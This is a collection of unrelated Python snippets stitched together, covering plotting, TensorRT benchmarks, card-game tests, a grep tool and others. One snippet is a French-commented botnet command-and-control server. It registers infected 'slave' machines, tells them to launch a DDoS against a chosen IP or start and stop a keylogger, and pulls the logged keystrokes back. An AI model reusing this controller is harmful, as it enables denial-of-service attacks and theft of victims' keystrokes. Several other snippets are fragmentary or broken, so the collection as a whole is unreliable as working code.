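    tagged = [('the', 'DT'), ('little', 'JJ'), ('cat', 'NN'), ('sat', 'VBD')]
    print(npchunk_features_ultimate(tagged, 2, history=[]))
    # {'pos': 'NN', 'word': 'cat', 'prevpos': 'JJ', 'nextpos': 'VBD', 'tags-since-dt': 'JJ'}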
|
import numpy as np
import csv
import matplotlib.pyplot as plt
path1='./training_log_cnn_pretrain.csv'
with open(path1,'r') as f:
reader1 = csv.reader(f)
datas1 = [[row[0],row[1],row[2],row[3],row[4]] for row in reader1]
datas1=np.array(datas1[1:31],dtype=np.float32)
path2='./training_log_cnn_custom.csv'
with open(path2,'r') as f:
reader2 = csv.reader(f)
datas2 = [[row[0],row[1],row[2],row[3],row[4]] for row in reader2]
datas2=np.array(datas2[1:31],dtype=np.float32)
x = np.array(range(1,31))
plt.figure()
plt.rcParams["font.family"] = "Arial"
lw=1.5
ax1 = plt.subplot(2,1,1)
plt.plot(x, datas1[:,0], color='darkorange',
linewidth=lw, label='Anomaly accuracy = %0.2f' % 0.88)
plt.plot(x, datas1[:,1], color='blue',
linewidth=lw, label='Anomaly precision = %0.2f' % 0.85)
plt.plot(x, datas1[:,2], color='red',
linewidth=lw, label='Anomaly recall = %0.2f' % 0.84)
plt.plot(x, datas1[:,3], color='black',
linewidth=lw, label='Anomaly F1_score = %0.2f' % 0.84)
plt.plot(x, datas1[:,4], color='green',
linewidth=lw, label='Pattern accuracy = %0.2f' % 0.96)
plt.xlim([1, 31])
plt.ylim([0.3, 1.0])
plt.xlabel('Number of epoch')
plt.ylabel('Evaluation metrics')
plt.legend(loc="lower right")
ax = plt.gca()
#ax.set_aspect(1)
bwith=1.5
ax.spines['bottom'].set_linewidth(bwith)
ax.spines['left'].set_linewidth(bwith)
ax.spines['top'].set_linewidth(bwith)
ax.spines['right'].set_linewidth(bwith)
ax2 = plt.subplot(2,1,2)
plt.plot(x, datas2[:,0], color='darkorange',
linewidth=lw, label='Anomaly accuracy = %0.2f' % 0.85)
plt.plot(x, datas2[:,1], color='blue',
linewidth=lw, label='Anomaly precision = %0.2f' % 0.81)
plt.plot(x, datas2[:,2], color='red',
linewidth=lw, label='Anomaly recall = %0.2f' % 0.79)
plt.plot(x, datas2[:,3], color='black',
linewidth=lw, label='Anomaly F1_score = %0.2f' % 0.80)
plt.plot(x, datas2[:,4], color='green',
linewidth=lw, label='Pattern accuracy = %0.2f' % 0.94)
plt.xlim([1, 31])
plt.ylim([0.3, 1.0])
plt.xlabel('Number of epoch')
plt.ylabel('Evaluation metrics')
plt.legend(loc="lower right")
ax = plt.gca()
#ax.set_aspect(1)
bwith=1.5
ax.spines['bottom'].set_linewidth(bwith)
ax.spines['left'].set_linewidth(bwith)
ax.spines['top'].set_linewidth(bwith)
ax.spines['right'].set_linewidth(bwith)
plt.show()
|
class RaCRohaCentral:
president = "Rtr. Akash Rumade"
secretary = "Rtr. Satyen Deshpande"
treasurer = "Rtr. Yash Shinde"
class Avenue(RaCRohaCentral):
def display(self):
print(f"Roha Central has 4 avenue - PDD, CSD, CMD, ISD, president is {self.president}")
president = "Rtr. Yash Shinde"
a = Avenue()
a.display()
print(a.president)
|
# import the socket module to allow network communication
# import argparse to be able to define command-line arguments
# import threading so that different actions can run in their own threads
# import time to create pauses during certain actions
import socket as modSocket
import argparse
import threading
import time
lock = threading.Lock()
"""
creation de l'objet Connexion, composé de 9 champs et 2 méthodes
1ère methode : elle va permettre d'écouter sur un port donné, et enregistrera les ip des machines connecté pendant l'écoute
dans un fichier "ListeIP.txt", une fois terminé elle vas faire appelle à la méthode receive situé dans le même objet.
2ème methode : elle va permettre de se connecter à plusieurs machines, grace à leur ip enregistrés dans le fichier "ListeIP.txt"
une fois terminer elle va lancer l'interface choix, qui vas nous affciher les menus des actions.
Ces 2 méthodes sont allouer à un processus chacun
"""
class Connexion():
def __init__(self, adresseMachine, carteReseauEcoute, listeIP, port, fichier, chemin, ip, date, clients, nbLine):
self.adresseMachine = adresseMachine
self.carteReseauEcoute = carteReseauEcoute
self.listeIP = listeIP
self.port = port
self.fichier = fichier
self.chemin = chemin
self.ip = ip
self.date = date
self.clients = clients
self.nbLine = nbLine
def listen(self, carteReseauEcoute, port, fichier, clients, date, nbLine):
carteReseauEcoute.bind(("", port))
carteReseauEcoute.listen()
while True:
print("Attente de connexion")
connReseau, addr = carteReseauEcoute.accept()
connReseau.recv(1024)
listeIP.append(addr[0])
clients.append(connReseau)
i = 0
print(listeIP)
print ("L'IP du slave est : ", listeIP[i])
i+=1
fichier.write(str(listeIP))
fichier.seek(0)
time.sleep(2)
essai = threading.Thread(target=objetChoixAction.choix, args=(connReseau, ))
essai.start()
def choix(self, connReseau):
        # small menu asking which method to launch
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
while select != 5:
            # run the selected menu option
try:
if select == 1:
lock.acquire()
date = input("date pour le ddos, format(yyyy-mm-jj hh:mm) : ")
                    # launch the ddos method of the choixAction object
objetChoixAction.ddos(connReseau, ip, date)
lock.release()
                    # ask again what to do, until FIN is chosen
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 2:
                    # launch the start_log method of the choixAction object
objetChoixAction.start_log(listeIP, connReseau)
                    # ask again what to do, until FIN is chosen
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 3:
                    # launch the stop_log method of the choixAction object
objetChoixAction.stop_log(connReseau)
                    # ask again what to do, until FIN is chosen
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
elif select == 4:
nbLine = input("Combien de ligne voulez vous pour le get_log : ")
                    # launch the get_log method of the choixAction object
objetChoixAction.get_log(connReseau, chemin, nbLine)
                    # ask again what to do, until FIN is chosen
select = int(input("1)DDos \n2)Keylogger \n3)stop keylogger \n4)Logger historique \n5)FIN \nSélectionnez une option : "))
            # if the connection is closed by the client while the menu is shown, print the message below
except ConnectionAbortedError:
print("connexion arretée par le client")
for add in clients:
print("Fin du programme")
fichier.close()
carteReseauEcoute.close()
add.send("FIN".encode("utf-8"))
pass
def start_log(self, listeIP, connReseau):
print("Choix d'attaque : Keylogger. Signal envoyé")
#envoie "keylogger" au client
for add in self.clients:
add.send("keylogger".encode("utf-8"))
def ddos(self, connReseau, ip, date):
        # same pattern as above
print("Choix d'attaque : DDoS. Signal envoyé")
        # ask the user for the ddos date in the expected format
        # send "ddos" to the client
for add in self.clients:
add.send("ddos".encode("utf-8"))
            # send the contents of the date variable
add.send(date.encode("utf-8"))
            # pause for 200 milliseconds
time.sleep(0.2)
            # finally send the ip variable (provided via argparse)
add.send(ip.encode("utf-8"))
def stop_log(self, connReseau):
print("Choix d'attaque : stop keylogger. Signal envoyé")
#envoie "stop" au client
for add in self.clients:
add.send("stop".encode("utf-8"))
message = add.recv(1024).decode("utf-8")
if message == "logger arreté":
print(message)
else:
print(message)
def get_log(self, connReseau, chemin, nbLine):
print("Choix d'attaque : Logger transfert du logger. Signal envoyé")
#envoie "transfert" au client
for add in self.clients:
add.send("transfert".encode("utf-8"))
            # ask how many lines are wanted for the transfer
            # send the nbLine variable
add.send(nbLine.encode("utf-8"))
            # open the file at chemin (path provided via argparse) and keep it in the fichier variable
fichier = open(chemin, "wb")
            # receive the keylogger data
l = add.recv(1024)
print("salut")
            # write that data into the fichier file object
fichier.write(l)
# initialise the fields used by the Connexion object
fichier = open("ListeIP.txt", "a")
listeIP = []
chemin = ""
ip = ""
date = ""
clients = []
port = ""
nbLine = ""
adresseMachine = ("localhost", 5000)
# network socket used by the first method of the Connexion object
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
# bind an instance of the Connexion object to the objetChoixAction variable
objetChoixAction = Connexion(adresseMachine, carteReseauEcoute, listeIP, port, fichier, chemin, ip, date, clients, nbLine)
# set up argparse with the command-line arguments
parser = argparse.ArgumentParser()
# create the --listen option
parser.add_argument("--listen", type=int,
                    help="Listen on a given port and list the connected IPs; pass the port number to use")
# create the --upload option
parser.add_argument("--upload", type=str,
                    help="Upload the keylogger file; pass the path of the file")
# create the --ip option
parser.add_argument("--ip", type=str,
                    help="Send IPv4 packets to a given address; pass the IP of the server to ddos")
parser.add_argument("--conn", type=int,
                    help="Connect on a given port and list the connected IPs")
# initialise the args variable, which holds the parsed arguments
args = parser.parse_args()
# if --listen was given, run the block below
if args.listen:
    # chemin takes the value passed with --upload
    chemin = args.upload
    print(chemin)
    # ip takes the value passed with --ip
    ip = args.ip
    print(ip)
    # port takes the value passed with --listen
    port = args.listen
    print(port)
    # start the first method (listen) of the Connexion object
    objetChoixAction.listen(carteReseauEcoute, port, fichier, clients, date, nbLine)
|
import gzip
with gzip.open('somefile.gz', 'rt') as f:
text = f.read()
with gzip.open('somefile.gz', 'wt') as f:
f.write('text')
import bz2
with bz2.open('somefile.bz2', 'rt') as f:
text = f.read()
with bz2.open('somefile.bz2', 'wt') as f:
f.write('text')
with gzip.open('somefile.gz', 'wt', compresslevel=5) as f:
f.write('texts')
f = open('somefile.gz', 'rb')
with gzip.open(f, 'rt') as g:
text = g.read()
|
import os
import re
import sys
import getopt
class Greper:
"""
A greper for any platform.
"""
params_dict = {}
path_list = []
search_pattern = ''
search_pattern_cmp = None
def __init__(self):
"""
"""
pass
def grep(self):
"""
- 'params': a dict containing all parameters
"""
for path in self.path_list:
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
self.print_file(p)
def print_file(self, path):
"""
- `path`:
"""
line_number = 0
file_content = ''
print_content = ''
        try:
            with open(path, 'r') as f:
                file_content = f.readlines()
        except (IOError, OSError, UnicodeDecodeError):
            return
        for line in file_content:
            line_number += 1
            if self.need_to_print_line(line):
                print_content += ' ' + '< ' + str(line_number) + ' > ' + line
        if print_content != '':
            print(path)
            print(print_content, end='')
def need_to_print_line(self, line):
"""
"""
return re.search(self.search_pattern_cmp, line)
def set_params(self, params):
"""
- `params`: a dict containing all parameters
"""
self.params_dict = params
self.path_list = self.params_dict['path_list']
self.search_pattern = self.params_dict['search_pattern']
self.search_pattern_cmp = re.compile(self.search_pattern)
def dump(self):
"""
dump all parameters.
"""
p = ''
for (k, v) in self.params_dict.items():
p += ' dump parameters>> ' + str(k) + ' : ' + str(v) + '\n'
print(p, end='')
def get_options():
"""
deal with cmdline options.
"""
pass
if __name__ == '__main__':
params = {
'path_list' : ['E:/git/github/emacs'],
'search_pattern' : 'requ+',
}
# print(str(params))
greper = Greper()
greper.set_params(params)
greper.grep()
# greper.dump()
|
#!/usr/bin/python3
"""interface implemented by all heap variants"""
class PairingHeapInterface:
def __init__(self):
self.count = 0
def make_heap(self):
pass
def find_min(self):
pass
def insert(self, node):
pass
def delete_min(self):
pass
def merge(self, heap2):
pass
def delete(self, node):
pass
def pointer_updates(self):
pass
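# --- Hedged sketch (not part of the original interface) ---
# A deliberately naive list-backed variant showing how a concrete heap can fill in the
# interface above; node objects are assumed to expose a comparable .key attribute.
class ListHeap(PairingHeapInterface):
    def __init__(self):
        super().__init__()
        self.nodes = []
    def make_heap(self):
        self.nodes = []
        self.count = 0
    def find_min(self):
        return min(self.nodes, key=lambda n: n.key) if self.nodes else None
    def insert(self, node):
        self.nodes.append(node)
        self.count += 1
    def delete_min(self):
        smallest = self.find_min()
        if smallest is not None:
            self.delete(smallest)
        return smallest
    def merge(self, heap2):
        self.nodes.extend(heap2.nodes)
        self.count += heap2.count
    def delete(self, node):
        self.nodes.remove(node)
        self.count -= 1
    def pointer_updates(self):
        return 0  # a flat list keeps no structural pointers to update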
|
import tensorrt as trt
import pycuda.driver as cuda
import numpy as np
import torch
import pycuda.autoinit
import dataset
import model
import time
# print(dir(trt))
tensorrt_file_name = 'bert.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
context = engine.create_execution_context()
# class HostDeviceMem(object):
# def __init__(self, host_mem, device_mem):
# self.host = host_mem
# self.device = device_mem
# def __str__(self):
# return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
# def __repr__(self):
# return self.__str__()
# inputs, outputs, bindings, stream = [], [], [], []
# for binding in engine:
# size = trt.volume(engine.get_binding_shape(binding)) * engine.max_batch_size
# dtype = trt.nptype(engine.get_binding_dtype(binding))
# host_mem = cuda.pagelocked_empty(size, dtype)
# device_mem = cuda.mem_alloc(host_mem.nbytes)
# bindings.append(int(device_mem))
# if engine.binding_is_input(binding):
# inputs.append( HostDeviceMem(host_mem, device_mem) )
# else:
# outputs.append(HostDeviceMem(host_mem, device_mem))
# input_ids = np.ones([1, 1, 29, 29])
# numpy_array_input = [input_ids]
# hosts = [input.host for input in inputs]
# trt_types = [trt.int32]
# for numpy_array, host, trt_types in zip(numpy_array_input, hosts, trt_types):
# numpy_array = np.asarray(numpy_array).ravel()
# np.copyto(host, numpy_array)
# def do_inference(context, bindings, inputs, outputs, stream):
# [cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
# [cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# stream.synchronize()
# return [out.host for out in outputs]
# trt_outputs = do_inference(
# context=context,
# bindings=bindings,
# inputs=inputs,
# outputs=outputs,
# stream=stream)
def infer(context, input_img, output_size, batch_size):
# Load engine
# engine = context.get_engine()
# assert(engine.get_nb_bindings() == 2)
# Convert input data to float32
input_img = input_img.astype(np.float32)
# Create host buffer to receive data
output = np.empty(output_size, dtype = np.float32)
# Allocate device memory
d_input = cuda.mem_alloc(batch_size * input_img.size * input_img.dtype.itemsize)
d_output = cuda.mem_alloc(batch_size * output.size * output.dtype.itemsize)
bindings = [int(d_input), int(d_output)]
stream = cuda.Stream()
# Transfer input data to device
cuda.memcpy_htod_async(d_input, input_img, stream)
# Execute model
context.execute_async(batch_size, bindings, stream.handle, None)
# Transfer predictions back
cuda.memcpy_dtoh_async(output, d_output, stream)
# Synchronize threads
stream.synchronize()
# Return predictions
return output
# kwargs = {"./dataset/DoS_dataset.csv" : './DoS_dataset.txt'}
# train_data_set, data_idx_map, net_class_count, net_data_count, test_data_set = dataset.GetCanDatasetUsingTxtKwarg(100, 0, **kwargs)
# testloader = torch.utils.data.DataLoader(test_data_set, batch_size=256,
# shuffle=False, num_workers=2)
check_time = time.time()
cnt = 0
temp = np.ones([256, 1, 29, 29])
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
trt_outputs = infer(context, temp, (256, 2), 256)
print(trt_outputs.shape)
# print(trt_outputs)
# print(np.argmax(trt_outputs, axis=0))
# cnt += 1
# if cnt == 100:
# break
print(time.time() - check_time)
tensorrt_file_name = 'bert_int.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
context = engine.create_execution_context()
check_time = time.time()
cnt = 0
temp = np.ones([256, 1, 29, 29])
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
trt_outputs = infer(context, temp, (256, 2), 256)
print(trt_outputs.shape)
# print(trt_outputs)
# print(np.argmax(trt_outputs, axis=0))
# cnt += 1
# if cnt == 100:
# break
print(time.time() - check_time)
test_model = model.Net().cuda()
check_time = time.time()
cnt = 0
temp = torch.randn(256, 1, 29, 29).cuda()
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
# inputs = inputs.float().cuda()
normal_outputs = test_model(temp)
# print(normal_outputs)
print(normal_outputs.shape)
cnt += 1
if cnt == 100:
break
print(time.time() - check_time)
import tensorrt as trt
import numpy as np
import pycuda.autoinit
import pycuda.driver as cuda
import time
model_path = "bert.onnx"
input_size = 32
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
# def build_engine(model_path):
# with trt.Builder(TRT_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, TRT_LOGGER) as parser:
# builder.max_workspace_size = 1<<20
# builder.max_batch_size = 1
# with open(model_path, "rb") as f:
# parser.parse(f.read())
# engine = builder.build_cuda_engine(network)
# return engine
def alloc_buf(engine):
# host cpu mem
h_in_size = trt.volume(engine.get_binding_shape(0))
h_out_size = trt.volume(engine.get_binding_shape(1))
h_in_dtype = trt.nptype(engine.get_binding_dtype(0))
h_out_dtype = trt.nptype(engine.get_binding_dtype(1))
in_cpu = cuda.pagelocked_empty(h_in_size, h_in_dtype)
out_cpu = cuda.pagelocked_empty(h_out_size, h_out_dtype)
# allocate gpu mem
in_gpu = cuda.mem_alloc(in_cpu.nbytes)
out_gpu = cuda.mem_alloc(out_cpu.nbytes)
stream = cuda.Stream()
return in_cpu, out_cpu, in_gpu, out_gpu, stream
def inference(engine, context, inputs, out_cpu, in_gpu, out_gpu, stream):
# async version
# with engine.create_execution_context() as context: # cost time to initialize
# cuda.memcpy_htod_async(in_gpu, inputs, stream)
# context.execute_async(1, [int(in_gpu), int(out_gpu)], stream.handle, None)
# cuda.memcpy_dtoh_async(out_cpu, out_gpu, stream)
# stream.synchronize()
# sync version
cuda.memcpy_htod(in_gpu, inputs)
context.execute(1, [int(in_gpu), int(out_gpu)])
cuda.memcpy_dtoh(out_cpu, out_gpu)
return out_cpu
if __name__ == "__main__":
inputs = np.random.random((1, 1, 29, 29)).astype(np.float32)
tensorrt_file_name = '/content/drive/My Drive/capstone1/CAN/bert.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
# engine = build_engine(model_path)
context = engine.create_execution_context()
for _ in range(10):
t1 = time.time()
in_cpu, out_cpu, in_gpu, out_gpu, stream = alloc_buf(engine)
res = inference(engine, context, inputs.reshape(-1), out_cpu, in_gpu, out_gpu, stream)
print(res)
print("cost time: ", time.time()-t1)
|
n=[]
k=[]
k=int(input())
for i in range(0,k):
k=k[0]+k[1]
|
class node():
"""docstring for node."""
def __init__(self,data = None, parent = None):
self.data = data
self.parent = parent
self.child1 = None
self.child2 = None
class heap():
def __init__(self):
self.head = node()
self.inser = self.head
def add(self, data):
if self.head.data == None:
self.head.data = data
else:
if self.inser.child1 == None:
self.inser.child1 = node(data, self.inser)
else:
self.inser.child2 = node(data, self.inser)
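# --- Hedged completion sketch (not part of the original snippet) ---
# add() above never advances self.inser once both children of the insertion node are
# taken. A common way to keep the tree complete is to scan level by level for the first
# free child slot, as below; this only places nodes, it does not restore heap order.
class complete_heap(heap):
    def add(self, data):
        if self.head.data is None:
            self.head.data = data
            return
        queue = [self.head]
        while queue:
            current = queue.pop(0)
            if current.child1 is None:
                current.child1 = node(data, current)
                return
            if current.child2 is None:
                current.child2 = node(data, current)
                return
            queue.append(current.child1)
            queue.append(current.child2)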
|
import sys
sys.path.append('..')
import cards
import asyncio
from nose.tools import assert_raises
import random
def test_build_deck():
deck = cards.build_deck("Durak", 1)
assert(len(deck) == 36)
def test_create_durak_game():
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
assert(game['owner_id'] == 33)
assert(len(game['players']) == 1)
def test_double_join():
"""
attempts to join a game twice should raise a UserError
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
assert_raises(cards.UserError, cards.join_player, game, 34, 'trump')
assert_raises(cards.UserError, cards.join_player, game, 33, 'tobixen')
def test_start_game():
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
## there should be no duplicated cards in the deck
assert(len([x.display() for x in game['deck']]) == len(set([x.display() for x in game['deck']])))
def test_join_started():
"""
attempts to join a game that has already started should fail
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
assert_raises(cards.UserError, cards.join_player, game, 35, 'biden')
def test_use_first_card():
"""
The game creator should start attacking
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
asyncio.run(game.use_card(first_card))
def test_wrong_order():
"""
Attempts to play out of order should fail
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
second_card=game['players'][1]['hand'][0]
## Second card belongs to second player, first player has to start the turn
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
## This is OK
asyncio.run(game.use_card(first_card))
## This is not OK, defender should play, and card has already been played
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
## With the given random seed, this works fine
asyncio.run(game.use_card(second_card))
## card has already been played, an error should be raised
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
def test_wrong_defence():
"""
The card played has to be higher and of the same order or trump
"""
random.seed(1)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## King of diamond (trump)
second_card=game['players'][1]['hand'][0] ## Queen of diamond
asyncio.run(game.use_card(first_card))
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
def test_skip():
"""
Game on, attacker skips to continue attacking
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
second_card=game['players'][1]['hand'][0]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.skip([33]))
def test_pick_up():
"""
Game on, attacker plays second attack and defender draws
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## JD
second_card=game['players'][1]['hand'][0] ## AD
third_card=game['players'][0]['hand'][3] ## JC
fourth_card=game['players'][0]['hand'][1]
fifth_card=game['players'][1]['hand'][1]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.use_card(third_card))
asyncio.run(game.pick_up(34))
def test_game_on():
"""
Game on ... round #2 after pick_up
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## JD
second_card=game['players'][1]['hand'][0] ## AD
third_card=game['players'][0]['hand'][3] ## JC
fourth_card=game['players'][0]['hand'][1]
fifth_card=game['players'][1]['hand'][1]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.use_card(third_card))
asyncio.run(game.pick_up(34))
## should fail - card has already been played
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
## should fail - defender is still defender after picking
assert_raises(cards.UserError, asyncio.run, game.use_card(fifth_card))
asyncio.run(game.use_card(fourth_card))
asyncio.run(game.use_card(fifth_card))
asyncio.run(game.skip([33]))
def test_longer_game():
random.seed(8)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.join_player(game, 35, 'biden')
cards.start_game(game)
print(f"trump is {game['trump'].display()}")
hands = [game['players'][x]['hand'] for x in range(3)]
    ## The king of clubs is in trump's hand. It should not be in the deck. (bug observed 2020-10-29)
assert(not 'KC' in [x.display() for x in game['deck']])
assert( 'KC' in [x.display() for x in hands[1]])
def print_hands():
for i in range(3):
print(f"Player {game['players'][i]['player_name']} has this hand:")
print(" ".join([x.display() for x in hands[i]]))
print(f"Cards on the table:")
print(" ".join([x.display() for x in game['cards']]))
print_hands()
asyncio.run(game.use_card(hands[0][1]))
asyncio.run(game.use_card(hands[1][3]))
asyncio.run(game.use_card(hands[2][3]))
asyncio.run(game.use_card(hands[1][3]))
asyncio.run(game.skip([33]))
asyncio.run(game.use_card(hands[2][2]))
asyncio.run(game.use_card(hands[1][3]))
print_hands()
assert(not 'KC' in [x.display() for x in game['deck']])
asyncio.run(game.skip([33,35]))
## Card KC has been thrown and should be nowhere to be found
assert(not 'KC' in [x.display() for x in game['deck']])
assert(not 'KC' in [x.display() for x in hands[0]])
assert(not 'KC' in [x.display() for x in hands[1]])
assert(not 'KC' in [x.display() for x in hands[2]])
## All players should have six cards
assert(len(hands[0])==6)
assert(len(hands[1])==6)
assert(len(hands[2])==6)
print_hands()
|
from __future__ import annotations
from Engine.Elements.board import Board
from Engine.Elements.center import Center
from Engine.Elements.discard import Discard
from Engine.Elements.factory import Factory
from typing import List, Union
class Player:
has_starting_marker = False
def __init__(self, player_id: int, board: Board, center: Center, discard: Discard, factories: List[Factory]):
self.id = player_id
self.score = 0
self._board = board
self._center = center
self._discard = discard
self._factories = factories
self._opponents: List[Player] = []
def set_opponents(self, opponents: List[Player]):
self._opponents = opponents
def end_game_condition_met(self):
return self._board.end_game_condition_met
def end_turn_reset(self):
self._board.end_turn_reset_rows()
deduction, discard_tiles = self._board.reset_floor()
self._board.score -= deduction
self.score = self._board.score
self._discard.add_bag(discard_tiles)
def state(self):
start_tile = self._center.has_starting_tile
rows = self._board.rows
wall = self._board.wall
opponent_rows = [player._board.rows for player in self._opponents]
opponent_wall = [player._board.wall for player in self._opponents]
center_tiles = [self._center.tiles]
factory_tiles = [factory.tiles for factory in self._factories]
return rows, wall, opponent_rows, opponent_wall, start_tile, center_tiles, factory_tiles
# interface for AI to make choices
def make_choice(self, source: Union[Center, Factory], color: int, row: int):
# return True if valid choice
# return False if invalid choice
if isinstance(source, Factory):
success, tiles = source.claim_tile(color)
if not success:
return False
elif isinstance(source, Center):
success, tiles = source.claim_tile(color)
if not success:
return False
if source.has_starting_tile:
self.has_starting_marker = True
source.has_starting_tile = False
# add starting tile to board.
self._board.floor += [-1]
else:
return False
# guaranteed to have 1 tile at least
# return False if wrong color, color already on wall, or row filled
success = self._board.fill_row(row, color, len(tiles))
if not success:
return False
return True
|
from methods import Methods
class experiment:
def __init__(self):
self.method = Methods()
def testNB(self):
badWords = ['fuck','damn','work','cunt','bitch','whore','asshole']
lines = self.openFile("testing.txt")
results_NB = []
results_NB_noC = []
results_NB_bad = []
results_NB_noC_bad = []
for toCheck in lines:
status = toCheck.split(";")[1]
results_NB.append(self.method.rate_status(status,2,[]))
results_NB_noC.append(self.method.rate_status(status,3,[]))
results_NB_bad.append(self.method.rate_status(status,2,badWords))
results_NB_noC_bad.append(self.method.rate_status(status,3,badWords))
scores = [0,0,0,0]
scoresn =[0,0,0,0]
for i in range(len(lines)):
rate = lines[i].split(";")[0]
if rate == 'negative':
if rate == results_NB[i]:
scoresn[0] +=1
if rate == results_NB_noC[i]:
scoresn[1] +=1
if rate == results_NB_bad[i]:
scoresn[2] +=1
if rate == results_NB_noC_bad[i]:
scoresn[3] +=1
if rate == results_NB[i]:
scores[0] +=1
if rate == results_NB_noC[i]:
scores[1] +=1
if rate == results_NB_bad[i]:
scores[2] +=1
if rate == results_NB_noC_bad[i]:
scores[3] +=1
print(scores)
print(scoresn)
def openFile(self,name):
this = open(name,'r')
toReturn = []
for i in this.readlines():
toReturn.append(i[:-1])
return toReturn
def testKNN(self):
badWords= "fuck damn work cunt bitch whore asshole horny shit"
lines = self.openFile("testing.txt")
results_KNN = []
results_KNN_noC = []
results_KNN_bad = []
results_KNN_noC_bad = []
for toCheck in lines:
status = toCheck.split(";")[1]
results_KNN.append(self.method.kNN_getClass(status,2,""))
results_KNN_noC.append(self.method.kNN_getClass(status,3,""))
results_KNN_bad.append(self.method.kNN_getClass(status,2,badWords))
results_KNN_noC_bad.append(self.method.kNN_getClass(status,3,badWords))
scores = [0,0,0,0]
scoresn =[0,0,0,0]
for i in range(len(lines)):
rate = lines[i].split(";")[0]
if rate == 'negative':
if rate == results_KNN[i]:
scoresn[0] +=1
if rate == results_KNN_noC[i]:
scoresn[1] +=1
if rate == results_KNN_bad[i]:
scoresn[2] +=1
if rate == results_KNN_noC_bad[i]:
scoresn[3] +=1
if rate == results_KNN[i]:
scores[0] +=1
if rate == results_KNN_noC[i]:
scores[1] +=1
if rate == results_KNN_bad[i]:
scores[2] +=1
if rate == results_KNN_noC_bad[i]:
scores[3] +=1
print(scores)
print(scoresn)
test1=experiment()
test1.testNB()
test1.testKNN()
|
# -*- encoding: utf-8 -*-
import yaml
import os.path
from .database import *
from .exceptions import *
class Template(object):
"""Classe Template
- Utilizada para obter e gerenciar a base dos templates.
Atributos:
- template_list (private:list): Lista de templates
- templates (private:list): Templates
- path (private:string): caminho para os arquivos
- temp_extension (private:string): extensão dos arquivos de template
"""
__template_list = None
__templates = None
__path = None
__temp_extension = None
def __init__(self, path="", list_file=None, extension=".html"):
"""Método construtor da Classe
- Durante o instanciamento, os arquivos de lista e templates
- são lidos e armazenados nos atributos específicos.
Argumentos:
- self (object): instância da própria classe
- list_file (string): nome do arquivo da lista de templates (obrigatório)
- path (string): caminho para o arquivo (default=string vazia)
- extension (string): extensão opcional dos arquivos de template (default=".tmp")
Retorno:
- Sem retorno
"""
        # Prevents duplicate instantiation
        self.__template_list = DataList(path, list_file)
        self.__templates = list()
        # Set a new path if it differs from the default
        if path != self.__path:
